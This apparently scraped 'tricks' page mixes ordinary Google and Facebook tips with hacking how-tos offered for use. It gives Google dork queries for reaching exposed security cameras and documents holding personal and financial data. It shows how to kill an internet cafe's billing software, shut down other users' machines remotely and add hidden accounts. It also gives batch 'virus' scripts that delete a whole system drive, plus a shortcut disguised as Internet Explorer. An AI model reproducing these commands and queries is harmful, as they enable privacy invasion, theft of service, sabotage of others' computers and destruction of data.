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Google Trips & Tricks

Create Your Own Search Engine…Like Google

Follow Some Important Steps:

1. Type Following Address in Address Bar

2. Press Enter
3. See This Page

4:-Enter Any Name Like..S.U.M

5:-Click Create My Search Page

Now Your Search Page Has Created…
That’s All

How to use Google for Hacking

Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.
1. Hacking Security Cameras
There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. You will see something as follows

As you can see in the above screenshot, you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / – AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.

2. Hacking Personal and Confidential Documents

Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls

3. Hacking Google to gain access to Free Stuffs

Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem“
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.

“Search Similer Images By Google Images”

Google Images Is A Search Service Created By Google That Allows Users To Search The Web For Image Content. The Feature Was Introduced In July 2001.The Keywords For The Image Search Are Based On The Filename Of The Image, The Link Text Pointing To The Image, And Text Adjacent To The Image.

When Searching For An Image, A Thumbnail Of Each Matching Image Is Displayed. When The User Clicks On A Thumbnail, The Image Is Displayed In A Box Over The Website That It Came From. The User Can Then Close The Box And Browse The Website, Or View The Full-Sized Image.


  1. Open Google Images, Simple go and click on Images Link. Or Click On This Link Given Below_

  1. Drag And Drop Your Image, Want To Search Similer Image In Google Images Search Box.
  1. Now, Wait For Sometimes….

Search Tips
1. Use + Sign Between Words If You Want To Search The All Words.
For Example,
To Search History Of Football In Europe,

2. Type As:

3. To Search The Exact Match, Write The Words In Double Quotation Marks.
For Example To Search The Map Of Europe,
Then Type As:
"Map Of Europe"

4. Always Avoid To Use "And", "Or" With Search Keywords,
Because These Words Will Affect The Search Result.


Five Tips On Google Search

Sometimes when you search on Google you might not get the desired results or you might need to search a lot by changing the keywords you are searching for. These tips may helpyou in getting the desired results. Read them carefully and apply them while searching on google to get best results.

1. The “+” sign :

Google ignores some words like the, how and many other digits and words which actually slow down the search speed. Now if a common word is essential for you and you want Google to look for it the just give a space, put the “+” sign and type in the word. By this Google makes sure that, that word is actually included in the search as well. I came to knew of this as i was searching for a book, but Google was not showing the desired results, i used this technique and was able to get the details i was looking for.

2. Synonym search with “~”(tildy) sign:

If in case you want to search for the term as well it’s synonym, then in that case just add the “~” sign just in front of your term, you will then see the links for the same terms synonym. This can be really helpful in case you are searching for some specific results

3. Use of keyword “or”:

In case you want the search results to show two different categories then in that case you can use the keyword “or”. This will make sure that you will get the results accordingly. Similarly you can also use “and”, but in this case Google will show you pages where both the parameters are met, whereas in case of keyword “or”, any parameter that matches up, those links will be displayed.

4. Getting links of specific site:

Sometimes you might visit a site but not able to find the links or accurate pages in that site. What do you do? Just click on links to get the specific page? Well a simple answer is search through Google. Suppose you want to search for groups site in, then simple type in “groups site:”. You will see op tins coming for the Google groups. This is a pretty old method is very useful to get to a specific page of a site. The code for this would be “site:”

5. Search within a range:

You can search in Google within a desired range be it be money, weight, age or anything else, you just need to define the range and you will get the results you require. You need to type in the range as separated by “..”. But make sure you specify the unit as well like for money, weight, length or anything else. Like, for example:- tv 21..32 inches


Internet Cafe Hacking

Internet Cafe Hacking

Basic overview of this tutorial is if there's some kind of timer or client
software on the computer you're using at the Net Cafe you can hopefully disable it.
Firstly we need to gain access to command prompt (cmd.exe) to do this there's a few

1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.
Say that's disabled then we can try some other methods.

2) Press the Windows Logo + R and it will start run up. (hopefully)

3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.

4) Open notepad type "cmd.exe" without the quotation marks ("") and then
go to File/Save As.. and type the name for the file and have it end with
.bat for example "MyNewFile.bat" and select Save as type and select All Files.

Make sure to save it somewhere you can access it, Like the desktop.

If they have deleted Notepad then go in to Internet Explorer and right click
and select View Source or on the menu bar click View then source and perform the
same process as above.

Once you have done this you can run the file. If you can't open files from the desktop
then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to
the Desktop and it will show the saves files on the desktop in a folder type window.

Once you have access to command prompt you can perform some usefull actions e.g shutdown
programs, shutdown other peoples computers, add new accounts.

Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.

For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.

Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.

Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.

Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown computer on the network or your own computer (comes in

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.


Facebook Tricks

Face book Virus

In this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .

1) Open notepad
2) Type this in :

@echo off msg * WARNING VIRUS DETECTED!!!!!

PLEASE WAIT ..........."

3) Save as Internet Explorer .bat

4) Right click on Internet Explorer .bat and click Create Shortcut

5) Right click on shortcut and click Properties.

6) Click Change Icon

7) Choose Internet Explorer icon or similar, click OK , then click Apply

8) Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this: After five minutes windows will restart , that is all. This is totally harmless and will give you a laugh. Enjoy !


Download Your Entire Face book Data

Facebook Allows Its Users To Download Their Facebook Data In A Single Zipped File. The Data Includes Your Profile Details, Entire Wall, Messages, Notes, Contacts, And Of Course Videos And Photos.

Srep 1: First, Log In To Your Facebook Account,
Step 2: And Select “Account Settings” From Your “Account” Menu:
Step 3: Now Select “Download Your Information“:

You’ll Be Asked For Your Password. Facebook Will Further Authenticate You By Asking You To Identify Some People On Some Photos.

Facebook Will Then Generate The Archive Containing Your Data, And Send You The Download Link Per Mail. Once You Download Your Archive, Extract It, And Open The “Index.Html” File.

Enjoyyyyyy Reading Your Posts, Status And More From The Day Your Account Was Created On Facebook.

Caution: Please Keep This Data Safe As To Protect Your Privacy Or Simply Delete It After

Facebook Chat Tricks

Many People in Facebook thinks how can they use Bold Letters in their Messages or Chat.So here i m telling you , How can u send your chats n Messages in Bold & Underlined Letters.

For write Bold Letters :
To write bold letters type your message between two stars.
Example: *your message*

For Underline Letters: To write underlined letters type your message between two underscores.
Example: _your message_

Facebook Username and Facebook Email

You can have your own customized URL for your facebook profile like will make your profile attractive and you can easily refer someone to your profile by giving this easy to remember facebbok URL.The another benefit of making customized URL is that you will automatically get email address.You can use this new email address ( to login into your facebook account.

=> Trick to Create a Facebook Username :-

Look for the Username field and click on the Edit button.

In the text box type your username that you want to set. Facebook server will check for the username in its database whether it is available or not.

After giving your username click on Save Changes button and go to your Profile. You will see your profile link as

While setting up your username be careful because you can create this username only once.

=>Trick to Get Email Address :-

To set up a address, go to your Messages view and click the Claim your Facebook email link.

Now you will also be able to login into your Facebook Account with rather than any other Email Address. At the Facebook login Page enter your facebook username along with i.e. and enter your password. Your Facebook homepage will be open.

PC Shut Down Virus

Do The Following :-
1. Right Click On Your Desktop
2. Then In
New Click On Shortcut
3. A
Shortcut Wizard Will Appear
4. Type This In The Box:
shutdown -s -t 00
5. Your Done Now Right Click On The
Folder>Properties>Change Icon
6. And Then Choose Any Appropriate Icon
7. For
Restart Instead Of
-s Type -r
Enjoy It


Make Simple Virus in.bat

use these scripts on your own responsibility..

1.This Virus Deletes All The Content Of A Drive...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y

Save It As Anything.bat

3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
save as anyname.bat


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